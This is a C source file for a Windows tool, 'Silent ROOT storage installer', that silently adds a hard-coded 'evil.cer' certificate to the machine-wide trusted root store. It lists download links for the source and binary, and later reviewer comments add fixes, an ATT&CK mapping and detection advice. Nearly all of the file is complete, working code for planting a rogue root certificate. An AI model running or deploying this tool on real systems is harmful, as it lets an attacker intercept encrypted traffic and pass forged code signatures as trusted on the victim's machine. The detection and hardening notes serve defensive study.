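/*
 * Silent ROOT storage installer
 *
 * platform: Microsoft Windows
 * require:  Administrative privilege on target OS
 * usage:    srsi evil.cer
 * author:   Roman S Emelyanov
 * email:    ers@ers.msk.ru
 * date:     03.07.2003
 * compile with VC6: cl srsi.c crypt32.lib
 * source:   http://ers.msk.ru/soft/srsi.c
 * binary:   http://ers.msk.ru/soft/srsi.exe
 *
 * What the code does: reads one encoded certificate file and adds it to
 * the machine-wide "ROOT" system certificate store through CryptoAPI,
 * replacing any existing matching entry.
 *
 * Notes for readers:
 *  - The usage line shows a file argument, but main() takes no arguments;
 *    the file name is the hard-coded "evil.cer" in the working directory.
 *  - Security relevance: software that relies on the Windows trust store
 *    (TLS clients, code-signing checks) treats chains ending in a ROOT
 *    store certificate as trusted, so an unexpected entry here undermines
 *    every such check on the host. This maps to MITRE ATT&CK T1553.004
 *    (Subvert Trust Controls: Install Root Certificate).
 *  - The code makes no UI call. NOTE(review): Windows is documented to
 *    prompt the user when a certificate is added to the per-user Root
 *    store, which would explain "silent" for the machine store - confirm.
 *  - Detection / hardening: baseline the machine root store and alert on
 *    additions (registry values under
 *    HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates, or a
 *    periodic `certutil -store Root` diff), and limit local administrator
 *    rights, which the header lists as a requirement.
 */

#define _WIN32_WINNT 0x0500
#define ENCODING (X509_ASN_ENCODING | PKCS_7_ASN_ENCODING)

#include "windows.h"
#include <stdio.h>

/*
 * Program entry point.
 *
 * Returns 0 when the certificate was added to the store and -1 on any
 * failure (the original used exit(-1) on failure and declared main as
 * void, leaving the success exit code unspecified).
 *
 * All resources (file handle, heap buffer, certificate context, store
 * handle) are released on every path through the single cleanup label.
 */
int main(void)
{
    /*
     * Machine-wide store. CERT_SYSTEM_STORE_CURRENT_USER would select the
     * per-user store instead (the original kept that as a commented-out
     * alternative).
     */
    DWORD dwSubjectFlags = CERT_SYSTEM_STORE_LOCAL_MACHINE;
    DWORD dwSize = 0;
    DWORD dwRead = 0;
    HCERTSTORE hStore = NULL;
    WCHAR szwStore[20];
    LPBYTE pbEncodedCert = NULL;
    PCCERT_CONTEXT pCertContext = NULL;
    LPCSTR szSubjectStore = "ROOT";
    LPCSTR szCertFile = "evil.cer";
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hHeap = NULL;
    int rc = -1;

    /* Get process heap */
    hHeap = GetProcessHeap();
    if (!hHeap) {
        printf("Unable to allocate memory for encoded certificate\n");
        goto cleanup;
    }

    /* Open certificate file; the name is an ANSI string, so call the A variant
       explicitly rather than depending on whether UNICODE is defined. */
    hFile = CreateFileA(szCertFile, GENERIC_READ, 0, NULL, OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Unable to open certificate file: %s\n", szCertFile);
        goto cleanup;
    }

    /* Get file length (0xFFFFFFFF is the GetFileSize failure value) */
    dwSize = GetFileSize(hFile, NULL);
    if (dwSize == 0xFFFFFFFF) {
        printf("Unable to get size of certificate file\n");
        goto cleanup;
    }
    if (dwSize == 0) {
        printf("Certificate file is empty\n");
        goto cleanup;
    }

    /* Allocate memory for encoded certificate */
    pbEncodedCert = (LPBYTE)HeapAlloc(hHeap, 0, dwSize);
    if (!pbEncodedCert) {
        printf("Unable to allocate memory for encoded certificate\n");
        goto cleanup;
    }

    /* Read encoded certificate data; a short read would leave the tail of
       the buffer uninitialized, so treat it as a failure too. */
    if (!ReadFile(hFile, (LPVOID)pbEncodedCert, dwSize, &dwRead, NULL) ||
        dwRead != dwSize) {
        printf("Unable to read encoded certificate\n");
        goto cleanup;
    }

    /* Close file handle as soon as the data is in memory */
    CloseHandle(hFile);
    hFile = INVALID_HANDLE_VALUE;

    /* Convert store name to the wide string CERT_STORE_PROV_SYSTEM expects */
    if (MultiByteToWideChar(CP_ACP, 0, szSubjectStore, -1, szwStore,
                            (int)(sizeof szwStore / sizeof szwStore[0])) == 0) {
        /* GetLastError() returns a DWORD (unsigned long): use %lu, not %d */
        printf("MultiByteToWideChar failed with %lu\n", GetLastError());
        goto cleanup;
    }

    /* Open certificate store */
    hStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, ENCODING, 0,
                           dwSubjectFlags, (LPVOID)szwStore);
    if (!hStore) {
        printf("CertOpenStore failed with %lx\n", GetLastError());
        goto cleanup;
    }

    /* Place certificate in store, overwriting a matching existing entry */
    if (!CertAddEncodedCertificateToStore(hStore, X509_ASN_ENCODING,
                                          pbEncodedCert, dwSize,
                                          CERT_STORE_ADD_REPLACE_EXISTING,
                                          &pCertContext)) {
        printf("CertAddEncodedCertificateToStore failed with %lx\n",
               GetLastError());
        goto cleanup;
    }

    printf("Certificate successfuly installed to ROOT storage\n");
    rc = 0;

cleanup:
    /* The returned context holds a reference that the original never freed */
    if (pCertContext) {
        CertFreeCertificateContext(pCertContext);
    }
    if (hStore) {
        CertCloseStore(hStore, 0);
    }
    if (pbEncodedCert) {
        HeapFree(hHeap, 0, pbEncodedCert);
    }
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }
    return rc;
}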